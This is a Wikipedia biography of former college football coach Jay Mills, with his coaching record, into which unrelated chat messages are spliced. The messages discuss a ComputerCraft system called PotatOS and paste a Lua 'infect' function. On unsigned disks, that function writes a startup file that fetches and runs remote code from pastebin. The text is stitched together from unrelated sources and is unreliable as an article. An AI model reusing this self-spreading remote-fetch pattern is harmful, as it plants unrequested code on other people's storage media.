Jay Mills

Jay Mills (born December 2, 1961) is former American football coach. He served as the head football coach at University of Minnesota Morris from 1993 to 1995 and at Charleston Southern University from 2003 to 2012, compiling a career college football record of 51–85. Mills retired from coaching on January 3, 2013 to pursue a new career path in athletic administration.[1] He now resides in Northern California where is the Executive Pastor of a local church[2].

Jay Mills
Biographical details
Born (1961-12-02) December 2, 1961
Playing career
1981–1983Western Washington
Coaching career (HC unless noted)
1984–1986Notre Dame (assistant)
1987–1992Boise State (assistant)
1993–1995Minnesota–Morris
1996–2002Harvard (assistant)
2003–2012Charleston Southern
Head coaching record
Overall51–85
Accomplishments and honors
Championships
1 Big South (2005)
Awards
Big South Coach of the Year (2005)

Playing career

Mills played football at the Western Washington University before graduating in 1984.

Coaching career

Before arriving at Charleston Southern University, Mills was offensive coordinator for seven seasons at Harvard University. He served as head coach at the University of Minnesota Morris, where he posted a 3–22 record as he helped the school transition from the National Association of Intercollegiate Athletics (NAIA) to NCAA Division II.[3]

Head coaching record

Year Team Overall ConferenceStanding Bowl/playoffs
Minnesota–Morris Cougars (Northern Sun Intercollegiate Conference) (1993–1995)
1993 Minnesota–Morris 2–91–56th
1994 Minnesota–Morris 1–100–67th
1995 Minnesota–Morris 0–3[n 1]0–1[n 1][n 1]
Minnesota–Morris: 3–221–12
Charleston Southern Buccaneers (Big South Conference) (2003–2012)
2003 Charleston Southern 1–110–45th
2004 Charleston Southern 5–51–34th
2005 Charleston Southern 7–43–1T–1st
2006 Charleston Southern 9–22–2T–2nd
2007 Charleston Southern 5–61–34th
2008 Charleston Southern 7–53–2T–2nd
2009 Charleston Southern 6–54–23rd
2010 Charleston Southern 3–81–5T–6th
2011 Charleston Southern 0–110–67th
2012 Charleston Southern 5–63–34th
Charleston Southern: 48–6318–31
Total:51–85
      National championship         Conference title         Conference division title or championship game berth

Notes

  1. Mills coached only the first three games of the season. The remaining seven games were coached by Steve Barrows. Minnesota–Morris finished the year with an overall record of 0–10, placing seventh in the conference with a mark of 0–6.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.

References

  1. "Jay Mills Announces Retirement". Archived from the original on February 15, 2013. Retrieved January 4, 2013.
  2. "Staff | Southwinds Church of Tracy". southwinds.org. Retrieved September 23, 2019.
  3. "Minnesota Morris Coaching Statistics" (PDF). Retrieved February 3, 2007.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.